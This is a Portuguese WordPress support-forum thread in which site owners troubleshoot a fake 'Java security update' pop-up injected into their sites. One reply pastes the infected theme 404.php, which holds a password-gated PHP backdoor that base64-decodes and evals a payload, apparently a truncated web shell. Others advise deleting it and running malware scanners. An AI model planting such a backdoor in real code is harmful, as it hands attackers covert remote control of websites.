Suporte » Outros assuntos » Mensagem: atualização obrigatória de segurança do Java.

  • Resolvido tcpengenhariacivil

    (@tcpengenhariacivil)



    Boa tarde.

    Hoje cedo tentei acessar o meu site e recebi uma mensagem de ‘Atualização obrigatória de segurança do Java’. Essa mensagem ocupa boa parte da tela e impossibilita a navegação no site. Estou certo de que é algum tipo de vírus, no entanto, não está relacionado à minha máquina, uma vez que várias pessoas em outros servidores estão apresentando o mesmo problema.

    Obs.: já atualizei o WP, reiniciei o note, reiniciei a rede, tentei entrar por navegação anônima, limpei o cache do navegador, passei antivírus, mas nenhum sucesso.

    A mensagem é muito semelhante ao que está nessa página:
    https://www.java.com/pt_BR/security/

    e ainda fornece um link para baixar seja lá qual for o malware (suposta atualização do Java). Não encontrei nenhum problema parecido em minhas buscas. Se alguém tiver ideia de como posso resolver isso, ficaria muito agradecido!

    Site: http://tcpengenhariacivil.com.br/

    A página que eu preciso de ajuda: [fazer login para ver o link]

Visualizando 15 respostas - 1 até 15 (de um total de 18)
  • Moderador Felipe Elia

    (@felipeelia)

    Olá @tcpengenhariacivil,

    Acessei agora o site e pareceu tudo normal. Conseguiu resolver o problema? Se sim, não esqueça de voltar aqui e dizer como fez e marcar seu tópico como resolvido. Assim você ajuda outras pessoas que podem chegar por aqui com problemas parecidos.

    Boa tarde!

    Após criar este tópico, não tomei nenhuma atitude além das que mencionei acima, o problema simplesmente sumiu em questão de dias. Não sei o que pode ter acontecido, talvez um malware no servidor que tenha sido eliminado pelo próprio WordPress. De qualquer forma, agradeço pela atenção!

    leandrotmello

    (@leandrotmello)

    Boa tarde!

    Ao acessar o seu site http:/www./tcpengenhariacivil.com.br/, ainda aparece a janela de solicitação do Java.
    No site aqui da empresa também aparece a mesma coisa. O endereço é o http://www.harasseteflechas.com.br/
    Sabem dizer se isso é algum tipo de vírus, ou é do Java mesmo?

    haroldotiberio

    (@haroldotiberio)

    Estou com o mesmo problema, estou verificando neste momento se teve algum arquivo malicioso no ftp

    leandrotmello

    (@leandrotmello)

    Bom dia!
    Alguma novidade?

    Moderador Felipe Elia

    (@felipeelia)

    Oi @tcpengenhariacivil,

    Acabei de tentar acessar o tcpengenhariacivil.com.br e fui redirecionado para outro site. Se você tem acesso ao painel do WordPress instale um plugin chamado WordFence e rode seu “scan”, muito provavelmente ele foi infectado.

    Além disso veja se você está com o WordPress, plugins e temas atualizados, troque sua senha de FTP e dos usuários administradores.

    haroldotiberio

    (@haroldotiberio)

    Eu não consegui resolver o meu site ainda, mostra a mensagem da atualização do java, paguei todos arquivos que me pareceram estranhos, instalei o plugin sucuri, o wordfence e nada ainda de solução, estou procurando no banco algum vestigio

    natankm

    (@natankm)

    Também estou com o mesmo problema no meu site. Rodei WordFence, antivírus da hospedagem, excluí plugins e nenhuma solução.

    Alguém tem alguma novidade?

    haroldotiberio

    (@haroldotiberio)

    ACHEI A SOLUÇÃO !!!! UHU o código criptografado esta dentro do arquivo 404.php do seu tema. Eu usei o plugin “Anti-Malware Security and Brute-Force Firewall”

    natankm

    (@natankm)

    Oi @haroldotiberio
    Usei o plugin que comentaste e não encontrei nada.

    Tem certeza de que o arquivo era esse?
    O meu site já está sem ele e o problema persiste. :/

    haroldotiberio

    (@haroldotiberio)

    Sim, foi este plugin e meu diretorio e arquivo é esse: /www/wp-content/themes/oceanwp/404.php

    leandrotmello

    (@leandrotmello)

    No meu 404.php, aparece tudo isso abaixo. Haroldo, o que você fez?

    <?php
    if (isset($_GET[‘page’]))
    {
    if (md5($_GET[‘page’]) == “b34204f1ffddcf3ad51e021794376b5a”)
    {
    $ec = “LyoqDQogKiBXU08gMg0KICogV2ViIFNoZ……(VÁRIOS PARÁGRAFOS DE CARACTERES)………………FsnYSddKTs=”;

    $ecd = base64_decode($ec);
    eval($ecd);

    die();
    }
    }
    ?>
    <?php
    /**
    * The template for displaying 404 pages (Not Found)
    *
    * @package WordPress
    * @subpackage Twenty_Fourteen
    * @since Twenty Fourteen 1.0
    */

    get_header(); ?>

    <div id=”primary” class=”content-area”>
    <div id=”content” class=”site-content” role=”main”>

    <header class=”page-header”>
    <h1 class=”page-title”><?php _e( ‘Not Found’, ‘twentyfourteen’ ); ?></h1>
    </header>

    <div class=”page-content”>
    <p><?php _e( ‘It looks like nothing was found at this location. Maybe try a search?’, ‘twentyfourteen’ ); ?></p>

    <?php get_search_form(); ?>
    </div><!– .page-content –>

    </div><!– #content –>
    </div><!– #primary –>

    <?php
    get_sidebar( ‘content’ );
    get_sidebar();
    get_footer();

    haroldotiberio

    (@haroldotiberio)

    Ai esta o hack cara kkk!!!
    Apaga tudo isso:

    <?php
    if (isset($_GET[‘page’]))
    {
    if (md5($_GET[‘page’]) == “b34204f1ffddcf3ad51e021794376b5a”)
    {
    $ec = “LyoqDQogKiBXU08gMg0KICogV2ViIFNoZ……(VÁRIOS PARÁGRAFOS DE CARACTERES)………………FsnYSddKTs=”;

    $ecd = base64_decode($ec);
    eval($ecd);

    die();
    }
    }
    ?>

    haroldotiberio

    (@haroldotiberio)

    Pessoal, voltou o problema, não sei mais o que fazer, não encontrei ainda onde ta essa m****…

    • Esta resposta foi modificada 9 meses atrás por  Felipe Elia. Razão: retirado um palavrão
    natankm

    (@natankm)

    Também esgotei todas as minhas alternativas e não consegui solucionar o problema.

    Já que esse tópico aparece como “resolvido”, abri um novo aqui: https://br.wordpress.org/support/topic/atualizacao-obrigatoria-de-seguranca-do-java/

Visualizando 15 respostas - 1 até 15 (de um total de 18)
  • O tópico ‘Mensagem: atualização obrigatória de segurança do Java.’ está fechado para novas respostas.